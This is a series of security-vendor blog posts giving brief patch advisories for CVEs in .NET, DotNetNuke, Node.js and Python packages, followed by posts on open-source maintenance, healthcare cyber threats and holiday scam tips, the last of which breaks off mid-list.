Attention! New .NET Vulnerabilities

4min read

Image of dark room with an open door. Label on the left saying 'Vulnerabilities .NET'

Greetings App Sec community! Meterian is back with some .NET vulnerabilities which need some attention. Both these vulnerabilities are of a medium to high threat nature, so make sure to give this a read, it’ll be worth your while. The first case deals with a cross-site scripting vulnerability, whilst the second can cause a core denial of service issue. Don’t let hackers use this as a backdoor to your systems and networks. Stay protected people!

  • CVE-2019-1301: .NET Core suffers from a denial of service vulnerability when it improperly handles web requests.
  • CVE-2019-12562: There is stored cross-site scripting vulnerability in DotNetNuke (DNN) versions before 9.4.0, allowing attackers to store and embed malicious script into the administration notification page.

CVE-2019-1301

Vulnerability Score: 7.5/HIGH

Platform: .NET

Components: 

Affected Versions: 

  • .NET Core  / Microsoft.NetCore.App: 2.1.0-2.1.12 or 2.2.0-2.2.6
  • System.Net.Sockets: 4.3.0

The first .NET vulnerability we bring to your urgent attention is a denial of service vulnerability which occurs when .NET Core improperly handles web requests. The affected versions are in any .NET Core based application running on .NET Core 2.1.0 to 2.1.12 or 2.2.0 to 2.2.6, and System.Net.Sockets 4.3.0. This is regarded as a high threat to security and should be tended to immediately.

How can you confirm if your .NET application is affected? Run the dotnet –info command to see the list of the versions you have installed. You will then see output as shown below:

Lines of code which show the if your .NET application is affected.
https://github.com/dotnet/announcements/issues/121

If you see that you have a version of .NET Core which is less than 2.1.13 or less than 2.2.7, then unfortunately you are vulnerable. The same applies if you are using the meta-package “Microsoft.NETCore.App”, with the same version range. Please note that this also applies to the package System.Net.Sockets version 4.3.0.

What is .NET Core? It is an open source, development platform which is maintained by Microsoft and the .NET community on GitHub. It can be used to build device, cloud and IoT applications. 

Why is this vulnerability such a threat? Firstly, the attacker who is successful in the exploit of this vulnerability would use the denial of service against the .NET Core web application. Not only can this vulnerability be exploited remotely, but also without authentication of the user-cum-attacker. A denial of service attack (DoS) is focused on making a resource unavailable for the purpose of its design. The unavailability of a resource can come in many forms: manipulating network packets, programming, logical or resource handling vulnerabilities. Sometimes the attacker may execute arbitrary code to access critical information or execute commands on the server. Generally, this type of attack would cause response delays, large-scale losses, interruption to services and therefore an impact on availability. 

So how can you fix this issue? It is recommended to install the latest version of .NET Core but it depends on the versions which you have already installed. You may need to update if you have either version 2.1 (upgrade at least to 2.1.13) or 2.2 (upgrade at least to 2.2.7). If you are using the meta-package, upgrade the meta-package following the same version numbering. Also, if you are using System.Net.Sockets, please upgrade to version 4.3.1

CVE-2019-12562

Vulnerability Score: 6.1/MEDIUM

Platform: .NET

Component: DotNetNuke

Affected Versions: up to 9.4.0

You read right.  DotNetNuke (DNN) has a cross-site scripting vulnerability before versions 9.4.0 which is allowing remote attackers to store and embed malicious script into the admin notification page. The success of this exploit occurs when an admin user visits a notification page with stored cross-site scripting. 

A little information on DNN. First of all, it is a program that runs on Microsoft ASP.NET. It is also a framework, meaning it is a program designed to be extended. When you install DNN it can allow the creation of thousands of individual portals. These portals can then display pages and the pages display modules. More importantly, DNN is an open source web content management system meaning many businesses around the world rely on it for organisational purposes. DNNSoftware.com has over 1million registered members since 2013 and is used on nearly 750,000 websites globally. This might illuminate how many people could be affected by this vulnerability and why this needs urgent attention to avoid getting hacked.

The severity of this vulnerability is emphasized through the fact that stored cross site-scripting is the most dangerous type of cross-site scripting. The exploit could be used to perform any action that has administrator privileges. This includes: managing content, adding users, uploading backdoors to the server and more. 

Once this vulnerability had been detected it was reported to the DNN Software Security Department who have fixed the problem and released a patch. Users should update to the latest version 9.4.0 of DNN to avoid any security holes within their systems and networks. 

That is it from us…for now! Make sure to spread the word on these .NET vulnerabilities in order to help protect your apps or the apps you develop. But as you all know, open-source vulnerabilities are discovered daily, so you can expect us to be back with new vulnerabilities very soon!

Knowing is half the battle. The other half is doing. Let Meterian help your dev team stay in the know and on top of the latest updates to secure your apps continuously.  Sign up here to download the Meterian client today.  You’ll get an instant analysis of your first project for free.  See the risks immediately and know which components to remove or upgrade to secure your app.

Attention! New .NET Vulnerabilities

Love Your Developer: How to maintain & secure your open source components?

6min read

Happy Valentine’s Day! Meterian is feeling the love, so we want to share it by telling you the best way your business can love their developers! In this article we highlight the benefits and costs of using open-source software.  We’re also going the extra mile to give you tips on how to secure and maintain these components without slowing down your developers – the guardians of your business’ software that can propel you ahead of competitors.  

Here’s a little history lesson for you to begin with! Back in the 1940s-70s, software innovated at a slow pace. It wasn’t even regarded as a valuable asset in the working environment. The 1980s came and we see how software copyright was introduced, commencing a period where there was a boom in software innovation and a burst in software companies.  As the decades went on, people started to realise the value of open source software.

In 2000, the use of open source projects as well as components, began to grow significantly. Market research has predicted the global market size to grow from USD 11.40 billion in 2017 to USD 32.95 billion by 2022. Open source software has lowered development costs and accelerated innovation by reducing time to market. Now we see that companies who innovate early are 67% more likely to outperform.

Benefits of open source software 

Sometimes taking advantage of free resources is better. For example, in 2010 the use of open source was so common, it became a table stake. All companies were using it, otherwise they would fall at a disadvantage to their competitors. Open source solutions speed up software/hardware solutions, save money, provide flexibility and help companies stay on top of technological developments. This is supported by a survey which found 53% of companies have an open source program or plan to establish one in the near future

Developers are able to become creative and help solve problems in the software space when using open source solutions. It is the consumer and producer relationship that makes open source software thrive. As a result, there is more software availability for all users without having to reinvent the wheel. This in turn helps organizations. Recent research from Harvard Business School has shown that open source contributing companies capture up to 100% more productive value from open source than companies that do not contribute back. It creates a snowball effect: the more companies use it, the more the community is able to survey, criticize and praise it. Therefore, this strengthens the quality of the software used, including its security, usability and stability.

Open source software also comes with management benefits. Organizations tend to struggle when managing huge volumes of structured and unstructured data. This is where open source solutions can help! It helps to simplify business processes, as well as saving resources for things which are not needed for the success of a business. Essentially, it provides more flexibility for the company.

Taking a look at customer value is important. Due to the flexibility of open source software solutions, companies are able to customize to suit the needs of their particular customers. For example when you integrate two pieces of software. This requires less time than if the company were to write the integration software from scratch themselves. Therefore, it benefits both the company and their customers as well. Customers might even be willing to pay more for better solutions if they see this software is meeting their needs so efficiently and rapidly. It is all about viewing open source software as a resource and a powerful motivator.  

Costs 

When it comes to the law, open source solutions can sometimes be restricted to certain countries. For example, GitHub made headlines when it made it difficult for developers in Cuba, Iran, North Korea and Syria to access private repository services. There have been changes for open source licences in response to these types of situations, as it should be allowed to continue to expand and not interfere with international rules on software access. So companies should always know what licences are tied to the software they are using to avoid an IP breach. Read our past blog post on how the wrong licence can harm your business, if you haven’t already!

Moreover, open source components are attractive to cyber attackers. Firstly, open source vulnerabilities within components are discovered daily. Secondly, traditional testing tools and methods are ineffective in identification and therefore few companies understand the components being used in their applications. This lack of awareness leaves organizations increasingly exposed to an attack. For example Hollywood Presbyterian Hospital in California suffered a ransomware attack due to an outdated JBoss server software. The attacker uploaded malware to the out-of-date server without any interaction with a victim. This resulted in delayed patient care and the hospital had to pay $17,000 to recover access to files and the network.

A further cost or strain is the need to constantly maintain, test and secure these components. For example, in 2018 Sonatype released its fourth annual State of the Software Supply Chain Report and showed how software developers had downloaded more than 300 billion open source components in the past 12 months, 1 in 8 of those components having contained known security vulnerabilities.

Not catching these security bugs early on in the development process can lead to very costly and damaging outcomes.

How to maintain and secure open source components?

Firstly, you can start by making an inventory of all your open source components used when developing software. This inventory must include all the components, versions in use and the download locations for each project. Software bill of materials (SBoM) would be this inventory.

There is also a need to map out any known security vulnerabilities. The National Vulnerability Database (NVD) is a great place to provide information on publicly disclosed vulnerabilities in open source software. However, make sure you do not use this as your sole source for vulnerability information, as sometimes not all vulnerabilities are reported and the format of NVD records make it difficult to see which versions have been affected.   Meterian uses several sources in addition to the NVD.

Open source solutions are a brilliant resource. But to maintain its benefits there needs to be an effort to secure the open source components to lower the risk of them being vulnerable to cyber attacks. For example, a study conducted by Kula et al. on migrations of 4600 GitHub projects showed that 81.5% of them do not update their direct library dependencies, sometimes even in cases when they have been affected by publicly known vulnerabilities. This emphasizes the lack of awareness about security vulnerabilities within open source software. For this reason, to secure your open source components there is an urgency to upgrade software and keep on top of the known vulnerabilities.

https://www.pexels.com/photo/close-up-photography-of-yellow-green-red-and-brown-plastic-cones-on-white-lined-surface-163064/

Security is a community effort. There is a testing process for each project that is open to everyone. Developers using open source software are able to judge. This community of users are constantly evaluating and testing the security of certain components. Following this, there will be feedback on issues that have been found. For this reason, building open source software is safer than proprietary software because more people can test and contribute to its security. At the same time, there must be care about the code contributions accepted. A governance process and reviews in regards to any open source contribution should be made.

Constant vigilance is key. More than 3,600 new open source vulnerabilities are discovered every year and a significant amount appear daily.  Developers need to make sure their use of open source software is secure. Asking questions such as, is the code I am using good? Does it have any bugs? Due to vulnerabilities being identified on a daily basis–some have more high risk than others–there needs to be a practice within organizations to monitor or test each time the software changes. 

Meterian helps businesses get the most out of their software investments

Open source software has been changing how our world works, giving us a sustainable ecosystem that can work for everyone as long as it is looked after.

Meterian can automatically inventory your open source components and analyse them to check if they are up-to-date or have any publicly disclosed security and licence risks. Get started on building a proactive defence for your customer data and software IP.  Love your developers and let them innovate freely while using Meterian to secure your open source components. We can block insecure code before it goes live.  It will save you and your developers time and money, allowing your business to be less vulnerable to cyber attacks.  

Check if there are any open source security holes in your company’s website that puts your business at risk of a data or IP breach before it’s too late.

Try our free webscanner today.

Love Your Developer: How to maintain & secure your open source components?

Data Protection Day!

Image of a screen if the label 'Security' and a cursor hovering on it.
https://www.pexels.com/photo/internet-screen-security-protection-60504/

Yesterday, 28th January was an important day… The Council of Europe celebrated this year the 14th edition of Data Protection Day. 

This practice was to raise awareness about good practices in this field, informing users about their rights and how to exercise them.

This date is aligned to the anniversary of the opening for signature of the Council of Europe’s Convention 108 for the Protection of individuals in relation to automatic processing of personal data. For the past 30 years this has been a cornerstone of data protection, in Europe and around the world.

Why is Data Protection so important?

Data protection issues are very present throughout everyone’s lives. Not to mention in the work environment, in public relations, in the health sector, when buying goods and services, in travel or merely whilst using the internet.

However, not all people are informed on their rights. For this reason, the 28th January has been allocated to inform more users on their rights and so that data protection professionals address data subjects. It is important our digitally advanced society understands what personal data is collected from them and why, as well as what their rights are when their data is processed. This in turn, will help users be aware of the risks which comes with illegal mishandling and unfair processing of personal data.

Meterian can help!

Here are a list of our blogs which can help users be more cyber resilient and diligent when it comes to managing sensitive data.

Read also our past blog posts about vulnerabilities in:

to make sure your apps are not susceptible to such exploits that would risk data confidentiality.

Data Protection Day!

Read up on more Node.Js Vulnerabilities!

It’s that time of the week again folks. Meterian has two new Node.Js vulnerabilities to inform you on. Both are ranked a severity score of 7.5 and therefore considered to be of urgent attention. The first vulnerability concerns the bson-objectid package and the second the csv-parse module. Act fast and don’t let these vulnerabilities sit within your software/networks, or you could be at serious risk of a cyber attack. 

  • CVE-2019-19729: There is an issue discovered in the bson-objectid package version 1.3.0 for Node.js. Hackers could generate a malformed objectid, resulting in objects in arbitrary forms to bypass formatting if they have a valid bsontype.
  • CVE-2019-17592: The csv-parse module before version 4.4.6 for Node.js is vulnerable to Regular Expression Denial of Service. An attacker can cause a program to spend an unnecessary amount of time processing.

CVE-2019-19729

Vulnerability Score: 7.5 /HIGH

Platform: Node.js

Component: bson-objectid

Affected Versions: up to 1.3.0

Read up Node.js users you’ll want to know about this vulnerability! This was discovered on the 12th December 2019 by user Xiaofen9 on Github who noticed that ObjectID() allows an attacker to generate a malformed objectid by inserting an additional property to his user-input.

What is bson-objectid? This component allows you to create and parse ObjectIDs without using bigger components, such as other fully-fledged bson libraries.

The problem is that in certain conditions the input object will not be checked and will be returned early. This means that objects in arbitrary (potentially malicious) forms can completely bypass formatting and validation.

https://github.com/williamkapke/bson-objectid/issues/30

So what can hackers do? The manipulation with an unknown input leads to a privilege escalation vulnerability and could lead to an impact on confidentiality, integrity, and availability.

But what does a privilege escalation vulnerability actually entail? It is when a malicious user gains access to the privileges of another user account in a target system. This allows hackers to use these privileges to steal confidential data, run administrative demands or deploy malware.

What can you do to fix this? Unfortunately, at this time of writing there is still no remedy to this vulnerability. However, we recommend to cease using this component or switch to a full bson library like bson.

CVE-2019-17592

Vulnerability Score: 7.5/ HIGH

Platform: Node.js

Component: csv-parse module

Affected Versions: up to 4.4.5

Oh yes…we are not done yet. Here is another Node.js vulnerability for you all! This was discovered on the 14th of October and given a high score of 7.5 by NVD. The affected module is csv-parse which is a CSV module. This project is a parser which converts CSV text inputs into objects. It uses the Node.js stream.Transform API and provides a simple callback-based API. Released for the first time in 2010, it is very easy to use and helps the big community that uses it with large data sets. 

The problem is that before version 4.4.6 for Node.js is vulnerable to Regular Expression Denial of Service. A cast option is available in the module, it defines multiple functions to transform values based on their type. When such option is active and an integer cast is required, the corresponding __isInt() function uses a malformed regular expression that processes large inputs extremely slowly.

Why is Regular Expression Denial Service a backdoor for hackers? The attacker will insert in the file a malicious string which they know would take a very long time to evaluate. This means the attacker can make the user spend an excessive amount of time processing, resulting in the user’s executed commands to slow down or become unresponsive. Thus,  the availability of the system degrades. To make things worse, the exploit can be easily and remotely executed depicting clearly why this vulnerability is classified as problematic.

An image of a coffee shop. A barista making coffee with a speech bubble saying '*making coffee slowly*' and a woman at the till looking impatient with a speech bubble saying "My coffee is taking forever".

The best thing to do to avoid getting caught out by such exploit, is to upgrade to version 4.4.6 and above. 

That is it from us…for now! Make sure to spread the word on these critically-rated Node.js vulnerabilities in order to help protect your apps/the apps you develop. But as you all know, open-source vulnerabilities are discovered daily, so you can expect us to be back with new vulnerabilities very soon!

Knowing is half the battle. The other half is doing. Let Meterian help your dev team stay in the know and on top of the latest updates to secure your apps continuously.  Sign up here to download the Meterian client today.  You’ll get an instant analysis of your first project for free.  See the risks immediately and know which components to remove or upgrade to secure your app.

Read up on more Node.Js Vulnerabilities!

The Healthcare Sector: A Major Target for Cyber Attacks

An image of a doctor with his hands crossed.
https://unsplash.com/photos/hIgeoQjS_iE

The healthcare sector is seeing a progressiveness when innovating its medical practices. Forbes estimated digital health tech catering to out-of-hospital settings would grow by 30% to exceed $25 billion market globally by the end of 2019.

Alas, with the growth of innovation in this sector, there also comes the risk of cyber attacks. The healthcare sector in particular seems to be a major target for cyber criminals. Why is this? What is the financial impact? And most importantly what can be done?

Why do cyber criminals target the healthcare sector?

There are many reasons why the healthcare sector is a target:

  • One of the main reasons has to do with the financial worth of the masses of patient information hospitals store. With the introduction of GDPR (May 2018) it has never been so crucial for hospitals and businesses to keep patient data secure.
  • Medical devices tend to be easy entry points for cyber attackers. Due to these devices only being used for medical practices, cyber security is not within the design of the product. Although these devices will not store patient data, hackers can launch an attack on the server which holds important information. For example, a vulnerability was discovered in the work of insulin pumps of Johnson & Johnson. This vulnerability could have allowed attackers to get control of the device via Wi-Fi and provoke an overdose of insulin in the patient’s blood.
  • Medical staff are accessing data remotely on different devices and networks, which provides another entry point for attackers. The problem is that if one device is hacked, this might leave the rest of the organisation vulnerable.
  • Despite the healthcare sector progressively innovating its practices, staff are still reluctant to disrupt working practices with the introduction of new technology. This creates weaknesses in the healthcare organisation’s IT systems because it produces outdated software that allows entry points for cyber criminals.
  • The result of costly budgets, lack of resources and time constraints make it hard for healthcare staff to be fully educated in cybersecurity practices.
  • The vast amount of devices used in a hospital makes it hard for IT specialists to protect the entire hardware network against attacks.
  • A very serious reason why the healthcare sector is targeted is also to do with international espionage. For example:
  • John Riggi, a former ex-FBI cyber specialist: Hospitals are “being targeted by hostile nation-states for theft of intellectual property related to medical research, innovations, cancer studies, population health studies, research of medicine and clinical trials, and also potentially for conversion for military use such as biological weapons”
  • They might target hospitals to acquire the medical details of business leaders, politicians or military figures. An example is seen when the Singaporean government health database was hacked in 2018. Prime Minister Lee Hsien Loong was amongst the 1.5 million whose personal data was stolen from the database.
  • Another problem is if hackers target hospitals near military installations this could give sensitive records of military personnel and worse, insight into where troops might be deployed.

Popular cyber attacks within the healthcare sector

The most popular attacks to the healthcare sector have shown to be: 

  1. Ransomware attacks

Ransomware is a type of malware that will infect systems and files, making them inaccessible until someone pays a ransom. For the healthcare system, this slows down processes and often forces hospitals to turn to pen and paper. A recent example of this was seen last November with the ransomware attack on French hospitals in Rouen. More worryingly, the 2017 Healthcare Cybersecurity Report suggested ransomware attacks on the healthcare sector will quadruple by 2020 and ransom-takers are using more sophisticated tactics to hack into systems, as 350 different variants of ransomware were observed in 2018 compared to 241 in previous years.

Often these attacks will affect machines through: phishing emails with malicious attachments, a user clicking on a malicious link, or viewing an advertisement containing malware. But an entry point that is often disregarded is ransomware via an outdated component or software. For example Hollywood Presbyterian Hospital in California suffered a ransomware attack due to an outdated JBoss server software. The attacker uploaded malware to the out-of-date server without any interaction with a victim. This resulted in delayed patient care and the hospital had to pay $17,000 to recover access to files and the network. What was interesting was that the attackers had used an open source tool, JexBoss, to search the internet for a vulnerable JBoss server and networks which had been infected. Organisations that handle healthcare data have to make sure to update their systems as the majority of healthcare ransomware attacks are malware related.

A picture of a computer with some code on the screen.
https://unsplash.com/photos/OqtafYT5kTw

What is a JBoss Server? This is an open source application server program used for developing and deploying enterprise java applications, services and web portals. JBoss released its last version (7.1.1) in 2012, as it then switched its name to Wildfly in its next release. So if you are running an application server with the name JBoss, it is out of date and has been for a very long time.

  1. Data breaches

Data breaches can occur for many different types of reasons, from credential stealing malware to insider threats to lost devices. The reason why data breaches are so common within the healthcare sector is because Personal Health Information (PHI) is more valuable on the black market than financial or Personally Identifiable Information (PII). 

But why is PHI more valuable that PII? The average cost of a data breach for a non-healthcare related agency is $158 per stolen record. Yet, for the healthcare sector the average cost is $355. According to Infosec Institute, PII can sell on the black market for $1-2 but PHI has been said to be worth up to $363

This shows the value of patient data financially. However, PHI can be valuable also to target victims with fraud scams by taking advantage of their medical conditions. Cyber criminals have also been known to use stolen patient data to access prescriptions for their own use or resale. 

With the enforcement of GDPR since May 2018, securing patient and medical records has never been so important.

  1. Insider Threats

Did you know the healthcare sector is the only industry for which the biggest threat to data breaches come from internal sources? According to the 2019 Verizon Insider Threat Report, 46% of healthcare organisations were affected by insider threats

Insider threats have shown to stem from a lack of cybersecurity training amongst staff or employees maliciously giving away access codes or them purposefully selling PHI or PII for profit. For example, Anthem a Medical Insurance company learned in 2017 that an employee had been misusing and stealing Medicaid member data — up to 18,000 of PHI — as early as July 2016. This demonstrates the cautiousness there needs to be within the staffing of the healthcare sector to ensure people are not misusing PHI. 

  1. Business email compromise

Business email compromise is when hackers use spoof emails to compromise an account by tricking the employee to transfer money to a fake account. Normally, the fraudsters pretend to be a person of authority within the company to seem as if they might be asking a legitimate request. This has been successful because fraudsters tend to do a lot of research on their targets and will make sure to convincingly impersonate the individual whilst only sending the email to select few people. 

For example, in 2015 a local medical center reported that they had received a call from a pharmacy to confirm a large order of prescription drugs amounting to over $50,000. After a thorough investigation they discovered that the medical center had not placed that order. The pharmacy had called to check because the shipping address of the medical center didn’t match their records, yet all of the other credentials provided had been correct, such as:

  • The Drug Enforcement Agency ID number
  • Doctor licences
  • Pharmaceutical certificates

This clearly demonstrates how cyber crime is becoming more sophisticated.

The Financial Impact

Data breaches are particularly strenuous on the healthcare sector because they take longer to deal with an attack due to a lack of financial resources or trained personnel. To make matters worse, by 2020 security breaches are said to cost the healthcare sector 6 trillion dollars. A study conducted by Mid-Horizon found that hackers can very easily access domain level administrative privileges of most healthcare applications. 

The financial damage the WannaCry attack placed on the NHS in 2017 was significant. The Department of Health said the attack cost the NHS £92 million due to a third of hospital trusts and 8% of GP practices had affected computers. The hack forced 200,000 computers to lock out their users with red-lettered error messages demanding a ransom in Bitcoins. 

This is all the more reason the healthcare sector need to prioritise their cybersecurity as these sorts of attacks could have crippling consequences. 

A picture of some doctors/nurses walking down a white corridor.
https://unsplash.com/photos/Pd4lRfKo16U

What can be done? 

On a national level, there are some countries that set a good example. After the cyber siege in 2007, the Estonian government created a cybersecurity strategy built into their law enforcement. After one of their reports found that 11,000 cybersecurity incidents happened in 2018, Estonia introduced a blockchain technology to have more control over electronic patient records. This meant there was a time-stamped record of anyone in contact with/adding/omitting information. Conversely, patients use electronic identification cards to access their health information and can decide who they share the information with.

Although many security executives think that their programs are providing sufficient protection, these programs might not be securing the actual patient or member data. There needs to be an understanding between compliance-driven strategy which is when programs do not stand up to the test of the attackers and security-driven strategy when programs are designed to deal with attackers and the threats they create. This means a refocus on the actual risks of the healthcare infrastructure:

  • Where is the patient data?
  • Where does it live? 
  • How is it stored?
  • How is it protected?
  • Are these protections sufficient?

Therefore when new technologies are in place there can also be a focus on:

  • If the technologies are fully supported 
  • If the technologies are deployed across the organisation’s entire enterprise
  • That the technologies have no limited capacities
  • That the technologies are never unmonitored

Both patient care and business continuity are important to healthcare organisations.  As hospitals and caregivers rely on technology to deliver greater gains for more timely care and more efficient business processes, they must ensure their systems are secure and stable for everyday operations. This requires a cyber resilient approach that addresses people and processes, as well as the technology used. Read Meterian’s blog post on how your organization  can become more cyber resilient.

The Healthcare Sector: A Major Target for Cyber Attacks

New Python Vulnerabilities!

Image of thief climbing out of laptop shining flashlight on Python icon, titled Vulnerability Focus: Python.

In honour of Meterian introducing Python into their beta production, here are two Python vulnerabilities which you should look out for. We don’t like it when systems or computers behave in unexpected ways. It’s worse when such outcomes result in a cyber security incident. This month’s Python vulnerabilities can cause unexpected behaviours which hackers could exploit to compromise the integrity of your system in unpredictable ways. Don’t waste any time as you could be affected, so read on and learn how to avoid these risks.

  • CVE-2019-18874: through python-psutil versions 5.6.5 there are risks of double free consequences. Attackers could use this issue to cause psutil to crash, therefore a denial of service, and possibly execute arbitrary code.
  • CVE-2019-17626: ReportLab through 3.5.31 allows remote code execution because of toColor(eval(arg)) in colors.py. This vulnerability could affect confidentiality, integrity, and availability within your software/network.

CVE-2019-18874

Vulnerability Score: 7.5 / HIGH

Platform: Python

Component: python-psutil

Affected Versions: up to 5.6.5 inclusive

Indeed…Python has a vulnerability within the package python-psutil. This was discovered on the 11th November 2019 by Riccardo Schirone who noticed that the psutil incorrectly handled certain reference counting operations. 

Python-psutil, is a Python package which provides convenient functions for accessing system process data. It is a cross-platform library for retrieving information on running processes and system utilization in Python. It is mainly used for system monitoring, profiling and limiting process resources and management of running processes. Psutil supports a range of platforms: Linux, Windows, macOS, FreeBSD, OpenBSD, NetBSD, Sun Solaris and AIX.

How does this vulnerability happen? It was caused by incorrect reference counting handling within for/while loops that convert system data into said Python objects. If an error occurred, the reference counter would be dropped twice.   In this case, the computer system’s memory storage is mishandled. Essentially, a double free releases the same area of memory twice.  

How can hackers take advantage of the system? They could use this vulnerability to cause the psutil program to crash which could lead to a denial of service and potentially the execution of arbitrary code. This execution of arbitrary code will provide the attacker with the ability to execute any command of their choice in a target machine or process. Like landmines, this vulnerability is unpredictable and hard to spot. The idea is that the hacker is waiting for the system to trip up in order for the “landmine” (malicious code) to set off and infect the users’ system.

Image of an area with signs saying 'Danger!!!Mines!!!'
https://flickr.com/photos/anzclusters/3404799066/

To remedy this vulnerability, please upgrade to version 5.6.6 or higher of python-psutil. Upgrade fast Python users, you don’t want to be at risk of a cyber attack.

CVE-2019-17626

Vulnerability Score: 9.8 / CRITICAL

Platform: Python

Component: reportlab 

Affected Versions: up to 3.5.31 inclusive

Yes that’s right! We have one more Python vulnerability to inform you on. This one is found within ReportLab up to 3.5.31 and it has allowed remote code execution because of toColor(eval(arg)) in colors.py. This vulnerability was found on the 10th October 2019 and has been classified as critical. The issue is affecting the function toColor of the file colors.py. 

An image displaying the lines of code which show where the vulnerability was found.
https://bitbucket.org/rptlab/reportlab/issues/199/eval-in-colorspy-leads-to-remote-code

ReportLab is an open source engine for creating data-driven PDF documents and custom vector graphics. So it is free, hence open-source and widely used to generate reports in Python. The package sees more than 50,000 downloads per month, it is embedded in many products and was even selected to power the print/export feature for Wikipedia. So you can understand now why this vulnerability is critical and urgently needed to be fixed by users.

The issue with this vulnerability is that the manipulation of the input value to <span color=” can lead to a privilege escalation vulnerability. Not only can this attack be initiated remotely but it will impact a user’s confidentiality, integrity and availability. To make matters worse, it has been said that the price of this exploit be around USD $0-$5k since last stated on 16/10/19.

An image of 3 eggs, 2 white one brown. The first egg has a bubble which says in remarks to the brown egg 'Hey how'd you get in here?' and the brown egg has another bubble which says "Oh no they found me". This image represents the vulnerability discussed.
https://www.pexels.com/photo/eggs-in-tray-on-white-surface-1556707/

To remedy this vulnerability, please upgrade to version 3.5.32 or higher.  This is different from the recommendation of NVD which suggests to upgrade to version 3.5.26 or higher.  NVD also references the incorrect CWE, which should be corrected to CWE-95: Improper Neutralization of Directives in Dynamically Evaluated Code (‘Eval Injection’).  Based on Meterian’s analysis, we only see the remediation implemented in versions 3.5.32 or later.  You can verify the code here

Spread the word on these critically-rated, easy-to-exploit Python vulnerabilities in order to help the app sec community defend against unwanted exploits. But as you all know, open-source vulnerabilities are discovered daily, so you can expect us to be back with new vulnerabilities very soon!

Knowing is half the battle. The other half is doing. Let Meterian help your dev team stay in the know and on top of the latest updates to secure your apps continuously.  Sign up here to download the Meterian client today.  You’ll get an instant analysis of your first project for free.  See the risks immediately and know which components to remove or upgrade to secure your app.

New Python Vulnerabilities!

TOP 10 HOLIDAY HACKS

Beware: ‘Tis the season to be scamming’

Busy area of people with a Christmas tree in the centre. A thought bubble coming out of a parent saying "How was it seeing Santa?". Another thought bubble coming out of the child next to the parent saying "He asked me lots of questions...I think he might be a cyber criminal...".

Why is the Holiday season so popular for cyber criminals?

Organizations and individuals are at a much higher risk of suffering a cyber attack during this festive season. TAU’s 2018 Carbon Black Holiday Threat Report showed how during the winter holidays, there was a significant increase in cyber attacks. A survey conducted by Tufin Technologies similarly stated that 81% of hackers said they operated more intensely during the winter vacation. But why is this the case?

The total value of global retail e-commerce sales will reach $3.54 trillion by the end of 2019, up 20% over 2018. To top that off, nearly $142 billion (£106.5 billion) will be spent online in the UK during the holiday season this year. With so many people spending online, this becomes a goldmine for hackers to target those of us who shop online.

Additionally, with offices empty during the festive season this is an ideal opportunity for criminals to start causing havoc to your business. Even the lead up to the christmas break can be a vulnerable period, as your staff become more and more distracted. The lack of vigilance will allow hackers to attack and get away with it, supported by Tufin Technologies whose survey found 56% of hackers said Christmas was the best time to hack corporate computers.

The rise of emails sent during the holiday season means phishing emails are harder to spot. According to Responsys’ Retail Email Guide to the Holiday Season, 89% of top retailers increased their number of promotional emails sent in November and December by 47% compared to January and October. 

10 hacks to fight back: Don’t let hackers ruin your festive fun!

  1. Missing parcel fraud 

Have you ever received a card saying a parcel has been left on your porch but there is nothing there? You could be a victim of a scam. One of your shopping accounts might have been hacked allowing the hacker to spend freely using your credit card details.

What to do?

To tackle this scenario, make sure to call your bank so that they can freeze any more movement coming out of your account. Unfortunately, you might have not done anything wrong for your debit card details to be stolen, but in this instance acting fast is the best thing you can do when noticing something suspicious. 

  1. Fake ‘missed you’ delivery card

Most likely, a lot of us have received a ‘missed you’ delivery card when we weren’t at home to sign it off from the postman. However beware! Fraudsters have been known to print out a similar card and make it look like it came from the Royal Mail. They will use a fake number asking you to call to ensure the parcel is redelivered. On the other end of the phone will be the cyber criminal, waiting to collect your personal information so that they can then pretend to be you. 

What to do?

Never give your personal information over the phone, regardless of whether it might seem like a reliable source. Always look up the Royal Mail number online to double check if they match the number on the card you have received.  

  1. ‘Trojan horse’ malware attack

Malware attacks occur when people click on pop-up windows that appear on their computers offering free security software. The pop-up will most likely be a hacker. Malware will harvest your personal and financial information, send phishing emails to your contacts and provide remote access to your device.

What to do?

If you are unfortunate enough to install malware you should: 

  • Disconnect from the internet, as this will prevent anymore data from reaching the malware server.
  • Entering safe mode, allows your computer to run checks with the minimum required software and programs to load. This will prevent the malware from loading automatically.
  • Avoid logging into accounts during malware removal, to avoid sharing personal information.
  • Check your activity monitor to manage how your processes are running your computer and how it is affecting its performance.
  1. Man-in-the-middle harvesting

Using public Wi-Fi is a risk. This involves hackers sending out their own copy-cat Wi-Fi signal which you might latch onto by accident. If you do this, it could allow a hacker to spy on what you are doing and then be able to take your personal information.

What to do?

The main advice is not to use public Wifi when making money transactions or logging into personal accounts, otherwise you could be at risk of identity or card theft.

  1. ‘Phishing’ emails

According to NTT Security’s quarterly Threat Intelligence Report, phishing emails are up 74% with over 1.4 million new phishing sites created each month. Phishing emails leverage messages with malware attachments. TAU’s report says that the majority of cyber attacks during the holidays use phishing campaigns or spear-phishing campaigns to deliver malware to their victim’s computer systems. 

What to do?

If you have clicked on an attachment within a phishing email, this is what you should do:

  • Disconnect from the internet
  • Back-up your data 
  • Scan your device for malware using an anti-malware software 
  • Change all your login credentials as once cyber criminals have them they can access all your accounts
  • Set up a fraud alert
  1. Charity donation cheats

Fraudsters also take advantage of the goodwill of many people by pretending to be charity organizations. 

What to do?

Make sure to check any emailed details with the Charity Commission’s list to ensure your donations are going to the right place.

  1. Password theft

Many people don’t know that once a hacker has access to one of your passwords they can unlock many accounts online. Over Christmas fewer people are keeping tabs on where their money is coming and going, so make sure to be cautious for any suspicious activity.

What to do?

To avoid password theft you should try to :

  • Create strong passwords – use letters, numbers and symbols
  • Use multi-factor authentication 
  • Have different passwords for different accounts 
  • Use a password manager
  • Avoid sharing your password with anyone

If your password is stolen take the appropriate action in regards to the account affected and make sure you change your account passwords immediately. 

  1. Copy-cat websites

Don’t be fooled by bogus websites. They might seem legitimate but you might fall in the trap of paying for services or gifts you will never receive. 

What to do?

You can spot these fake websites by the final suffix letters. Fraudsters in the past have used suffixes such as ‘.co.com’ instead of ‘.co.uk’. Moreover, an ‘https’ prefix is more reliable than a ‘http’ address. Website address with ‘https’ indicate the site has an extra layer of security.  It uses the Secure Sockets Layer (SSL) to maximize security of data & transactions on the web with an encrypted channel between your device and the website you’re shopping on.

This way, your account login, credit card, and any other sensitive information details are encrypted to prevent eavesdropping. In short, avoid ‘Not Secure’ warning in browsers.

  1. Dark web targets

